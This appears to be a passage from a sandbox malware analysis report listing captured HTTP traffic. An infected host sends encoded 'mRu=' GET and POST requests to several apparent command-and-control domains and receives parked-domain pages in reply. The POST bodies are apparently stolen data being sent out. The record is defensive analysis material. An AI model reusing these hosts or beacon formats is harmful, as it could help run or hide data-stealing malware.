                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 73 6e 6d 48 45 4e 6e 67 50 6e 4a 74 7a 6a 54 30 6f 31 73 6b 45 55 54 42 69 63 47 6c 31 5a 51 74 68 2b 5a 2b 61 39 7a 31 54 69 79 32 35 39 65 76 55 71 6f 43 68 32 73 6e 4c 30 54 55 73 6d 61 44 56 59 31 36 35 75 4f 4e 47 75 69 59 6a 58 39 78 5a 74 56 4d 63 46 66 47 31 58 34 66 2b 2b 65 46 49 58 74 74 33 30 51 42 4b 5a 6a 45 31 72 4e 4b 54 77 64 4b 56 63 67 34 66 39 4e 51 63 35 57 35 32 6f 30 61 69 44 47 48 70 4d 5a 74 5a 6a 77 2f 45 49 7a 4c 74 74 39 44 37 65 2b 35 34 2b 4d 73 4a 43 34 4e 59 4c 7a 58 6a 41 34 56 55 50 66 55 33 6b 6d 4a 39 7a 66 2b 4a 30 36 66 39 64 32 56 66 39 47 4c 79 7a 57 36 51 66 46 46 77 64 43 63 46 72 79 53 65 4b 6f 63 69 74 45 59 69 46 55 49 72 62 73 47 43 39 68 56 52 59 56 55 36 4f 39 54 6b 64 65 6d 73 49 73 4f 6c 4b 2b 4a 6e 50 6c 62 46 31 74 71 41 2b 4f 71 4b 38 5a 38 52 69 38 4b 71 6a 53 53 2f 66 50 33 35 32 7a 36 6f 68 54 42 31 47 68 4c [TRUNCATED]
                                                                                                                            Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmosnmHENngPnJtzjT0o1skEUTBicGl1ZQth+Z+a9z1Tiy259evUqoCh2snL0TUsmaDVY165uONGuiYjX9xZtVMcFfG1X4f++eFIXtt30QBKZjE1rNKTwdKVcg4f9NQc5W52o0aiDGHpMZtZjw/EIzLtt9D7e+54+MsJC4NYLzXjA4VUPfU3kmJ9zf+J06f9d2Vf9GLyzW6QfFFwdCcFrySeKocitEYiFUIrbsGC9hVRYVU6O9TkdemsIsOlK+JnPlbF1tqA+OqK8Z8Ri8KqjSS/fP352z6ohTB1GhLNariG0KPE6Rm4rPH1s7060XfoXFFYStQLSIeAf8e0iq+kGo90U9ZSAOV9npDQDf/LwJGGujPNu53z4gkOWTURWGo5FBG0j6ug//AyvPoxPa40pSCTxh/Rlot7pshi9TJ7Vj44I7RhlGvbYnXvHWYPbULiSEPw5VbAkuiXdI/lw6rTsIGekKfPKZAHi9yRLjhSHTimVZV6Apki2R21hjoVdUveNAXRVFPtPVp57ilUasOOW0eP/eKdzvB6w+dh664T7jg/abJpTTg5Uzxr08vfVwXPREBzfWATAhtcYWUaWOBlshjMyikdQ2XWJQnR06aFGycjBu32lRuqAaaKKvUZRsmnva3jarqkvA1yFzTJdP9aV9RclWnKrCZuDTqFZOnUBzQS+PnwSk4wpQdLMyCgaQJDyPKbUs/mny78AhF4GxdRwbRFuZR0w7v0b/8jwcOGoNEWhD/hzJEQN8tKZ55zPvcYGnUCAemCzj6suFg7CUkpMZY6BKmP/PVeZomzIjfepJAX9xFQ2VqTYi/PZYaDGQQaM+uo9bdeAz01NOv1X4JwJUqoPP6XWzF1G/AUNEOfvrh+i9ouQ/kOm7AnJ8e+orOZO4oR/cY1aDSQEWlYWaTP7vNsV2VUOS5XGMC3zaYQlQdg0VDiTtbJ6U98dQaFd9XiYDY18j+d3 [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:34:16.115469933 CET5332OUTData Raw: 4c 4d 2f 36 6e 4c 63 76 2f 32 55 4b 2f 43 7a 46 51 4e 43 6c 64 2b 68 49 6c 77 62 53 47 54 4c 4a 71 76 41 64 42 30 6f 46 6d 2f 37 34 4f 73 36 42 64 4c 51 73 76 5a 6b 68 44 31 74 58 2b 65 41 31 64 53 52 5a 53 36 65 4d 72 5a 55 34 2f 30 6e 68 66 79
                                                                                                                            Data Ascii: LM/6nLcv/2UK/CzFQNCld+hIlwbSGTLJqvAdB0oFm/74Os6BdLQsvZkhD1tX+eA1dSRZS6eMrZU4/0nhfyOfjtxIepzDcpSsXuj6VAyan23f9ieKNcYONgL8oCy5RIQRroWQB7x7A78cHpUT66FtxZ4UMi6LZ/INMFrj9M1f8mKBTkyalR603nbDgDJk9cMVf+VfVzGee3+v9BzqhfE7ywPBvsd+joEkn4P2/Xth9sd4QaOZTUy


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            73192.168.11.204979284.32.84.3280
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:18.895777941 CET473OUTGET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:34:19.146723986 CET1289INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:19 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 9973
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            x-hcdn-request-id: 4947f39dd4c215a62359419fc0ddfea9-asc-edge5
                                                                                                                            Expires: Tue, 12 Nov 2024 14:34:18 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                                            Nov 12, 2024 15:34:19.146769047 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                                            Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                                            Nov 12, 2024 15:34:19.146811008 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                            Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                                            Nov 12, 2024 15:34:19.146855116 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                                            Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                                            Nov 12, 2024 15:34:19.146897078 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                                            Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                                            Nov 12, 2024 15:34:19.146939039 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                                            Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                                            Nov 12, 2024 15:34:19.146984100 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                                            Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                                            Nov 12, 2024 15:34:19.147027969 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                                            Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            74192.168.11.2049793208.91.197.2780
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:24.307627916 CET777OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4e 57 61 35 4e 37 51 69 59 73 4b 58 46 6b 79 67 75 77 65 44 64 6f 45 47 73 63 75 4a 59 64 5a 4f 5a 44 7a 65 67 41 46 52 46 6c 73 5a 43 6e 50 6e 65 44 37 54 75 37 4d 68 52 35 70 30 57 6b 47 6b 53 63 35 76 4f 59 68 5a 39 70 69 4f 61 54 4a 5a 49 4c 2f 79 49 67 69 4d 30 46 67 63 53 63 34 66 35 6a 48 54 2f 6c 76 41 6f 45 39 78 67 68 77 31 7a 53 6f 2f 49 34 55 54 4a 31 64 77 42 6e 33 72 4f 78 52 37 70 49 64 4b 4d 64 47 43 55 58 69 4e 45 5a 4f 6f 34 2f 72 4b 32 30 36 50 74 74 42 7a 73 63 78 38 74 6d 32 74 56 4f 38 69 37 69 32 37 49 67 65 45 41 67 3d 3d
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BANWa5N7QiYsKXFkyguweDdoEGscuJYdZOZDzegAFRFlsZCnPneD7Tu7MhR5p0WkGkSc5vOYhZ9piOaTJZIL/yIgiM0FgcSc4f5jHT/lvAoE9xghw1zSo/I4UTJ1dwBn3rOxR7pIdKMdGCUXiNEZOo4/rK206PttBzscx8tm2tVO8i7i27IgeEAg==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            75192.168.11.2049794208.91.197.2780
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:26.979526043 CET797OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 39 4f 59 68 62 65 68 45 78 52 43 6c 73 5a 4b 48 50 2b 42 7a 37 59 75 37 51 54 52 39 70 30 57 6c 69 6b 53 64 4a 76 4f 72 4a 59 39 35 69 41 44 44 4a 62 4d 4c 2f 79 49 67 69 4d 30 47 63 32 53 63 67 66 2b 54 58 54 2f 42 62 42 69 6b 39 79 6f 42 77 31 6b 43 6f 37 49 34 55 68 4a 30 77 58 42 6b 50 72 4f 77 68 37 70 63 4a 46 58 74 47 45 51 58 69 5a 4e 39 44 50 6a 63 57 2f 77 7a 61 79 6e 4d 46 52 67 71 38 6d 77 55 43 4a 57 64 67 51 2f 53 50 54 4b 69 66 66 64 6f 72 34 7a 64 58 4e 4f 63 55 4b 42 6d 51 41 72 56 6b 46 4c 62 63 3d
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO9OYhbehExRClsZKHP+Bz7Yu7QTR9p0WlikSdJvOrJY95iADDJbML/yIgiM0Gc2Scgf+TXT/BbBik9yoBw1kCo7I4UhJ0wXBkPrOwh7pcJFXtGEQXiZN9DPjcW/wzaynMFRgq8mwUCJWdgQ/SPTKiffdor4zdXNOcUKBmQArVkFLbc=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            76192.168.11.2049795208.91.197.2780
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:29.658507109 CET2440OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 31 4f 59 53 6a 65 67 6a 74 52 44 6c 73 5a 56 33 50 6a 42 7a 37 46 75 37 59 58 52 39 74 43 57 6d 4b 6b 51 2f 42 76 48 2b 39 59 33 35 69 41 4c 6a 4a 61 49 4c 2b 36 49 6a 4b 32 30 47 4d 32 53 63 67 66 2b 56 54 54 35 56 76 42 78 30 39 78 67 68 77 35 7a 53 6f 54 49 34 4d 78 4a 30 31 67 43 56 76 72 4e 51 78 37 71 70 64 46 4b 64 47 47 63 33 6a 65 4e 36 4c 51 6a 63 4c 47 77 7a 48 58 6e 50 56 52 78 73 39 35 74 6d 57 78 44 64 63 54 6a 44 6e 34 42 42 54 52 59 76 7a 61 79 37 54 4b 4a 72 34 4b 42 47 6f 74 7a 6c 4d 57 63 64 54 63 36 75 46 2f 31 64 67 32 74 37 52 32 39 59 78 6f 6e 66 70 67 6c 70 2f 32 49 62 48 53 6f 48 53 78 32 41 2b 41 4a 4f 35 6d 34 35 55 4f 4c 2f 6d 70 71 30 50 66 55 4a 4d 42 5a 56 65 2f 41 65 6b 42 32 69 66 6b 79 70 43 32 6f 66 58 42 6f 48 62 53 7a 4b 56 70 37 36 42 37 5a 36 50 36 50 30 71 66 66 65 49 4c 39 6b 4d 63 32 6d 49 55 6c 4f 6b 42 43 48 59 64 76 38 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO1OYSjegjtRDlsZV3PjBz7Fu7YXR9tCWmKkQ/BvH+9Y35iALjJaIL+6IjK20GM2Scgf+VTT5VvBx09xghw5zSoTI4MxJ01gCVvrNQx7qpdFKdGGc3jeN6LQjcLGwzHXnPVRxs95tmWxDdcTjDn4BBTRYvzay7TKJr4KBGotzlMWcdTc6uF/1dg2t7R29Yxonfpglp/2IbHSoHSx2A+AJO5m45UOL/mpq0PfUJMBZVe/AekB2ifkypC2ofXBoHbSzKVp76B7Z6P6P0qffeIL9kMc2mIUlOkBCHYdv8w7/y5cBMh5i4ISDdQjFFXSkCnhopHG0p0kOjVWCJHC6NyH2+N3LLgBrYabHNOs0Lawm2oC71aMb9wvxLv9ItTmRuom+Zri9nqIBO/A1rpm3vL0nU1aBUMBDAiGCgCIO2jx1IGffpmP4XVS/ymV+8H+YNQMpIh3Z252em5z8Nf3scyOvS9bCgCHiIiVzz1fpb6siRW+IlB+05dj5GbsDc5g9LJjq4mjDDOCrWxcvnZAfXnH+PqWffe0gdkjCvEaxErgyzJHUEkY9HE9Fp55alL4CyYNVJ/CUOpHA13Hfd3/HujN6CowDtj0+Pa4NVS8Emt5siPbVqwJlqwsqLDa25vSkAchwbDF8z0s1xup4u30ynY+qXV/kJSQC+EuaLBTWUW27SrnH1exjhV7tkpNmBH+hiUTismo1vCb0ZGyigRQ/NvgKkosiEgnS/FnStBYXaSrOm22h0vjM7R1t1iLjck6NGPJ6Ax6Z8uFvyaNe/iIxNQ47NuLh6UA0xlhJmpkVDk9CU9Nm6Ba9k/AvuC7guSLosD0aACF7nOuUo0Rdyqiq+Y1wtHEwRy8sfbk1+RCLcCn+DLZDcx4EycGwE6ygq3KrDhL4Ma1VftSjcXiDKXn5u0S3sT8inpyXauTcmFzU9JXmgqsMx5gsY+3ONgkTW7kzhd0YyCftYTp [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:34:29.658535957 CET5506OUTData Raw: 63 59 6e 41 6d 69 4b 38 7a 6d 39 68 62 51 4b 74 36 75 75 4e 72 43 71 41 75 41 48 78 38 77 43 72 48 2f 52 2b 4b 62 70 64 68 54 38 67 42 64 34 54 6c 4e 51 52 6e 7a 4c 6a 49 64 67 32 50 37 6b 6e 37 70 4e 53 72 69 6c 43 78 39 68 69 58 68 2b 63 70 64
                                                                                                                            Data Ascii: cYnAmiK8zm9hbQKt6uuNrCqAuAHx8wCrH/R+KbpdhT8gBd4TlNQRnzLjIdg2P7kn7pNSrilCx9hiXh+cpdBGEdl7QrUQvUW+BqKQAlS1cRm2anxGNjzXawhPNWvRZ45H5lFAtKrFMh/cLdUt4J6YYQK9aZuQ5XXl67TxuSHc2mBfmgYviTlUbLf0Q5oQSHolhTyd3p8cQmkwzH2yzSeA3Gb9PFQMX/IVHl0Zh2wGeuRJon+Jf4k


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            77192.168.11.2049796208.91.197.2780
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:32.334269047 CET485OUTGET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:34:32.753819942 CET995INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:32 GMT
                                                                                                                            Server: Apache
                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                            Set-Cookie: vsid=907vr4789676725425560; expires=Sun, 11-Nov-2029 14:34:32 GMT; Max-Age=157680000; path=/; domain=www.rimberiokitchen.online; HttpOnly
                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqpM3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g==
                                                                                                                            Content-Length: 2650
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Connection: close
                                                                                                                            Nov 12, 2024 15:34:32.753840923 CET188INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56
                                                                                                                            Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqp
                                                                                                                            Nov 12, 2024 15:34:32.753850937 CET1220INData Raw: 4d 33 6c 71 63 56 46 67 4d 46 77 76 56 43 2b 72 69 32 66 74 76 38 6a 79 4d 68 69 6c 4c 5a 45 41 78 76 2b 6a 2b 4c 58 62 55 42 59 73 2f 37 53 70 5a 53 67 51 7a 4d 74 74 68 31 78 6a 42 4b 49 4f 4c 32 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c
                                                                                                                            Data Ascii: M3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.rimberiokitchen.online/px.js?ch=1"></script><script type="text/java
                                                                                                                            Nov 12, 2024 15:34:32.753956079 CET1220INData Raw: 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2f 2a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2a 2f 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d
                                                                                                                            Data Ascii: } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <!
                                                                                                                            Nov 12, 2024 15:34:32.753968000 CET22INData Raw: 3e 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: ></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            78192.168.11.2049797203.161.49.19380
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:37.944828033 CET762OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
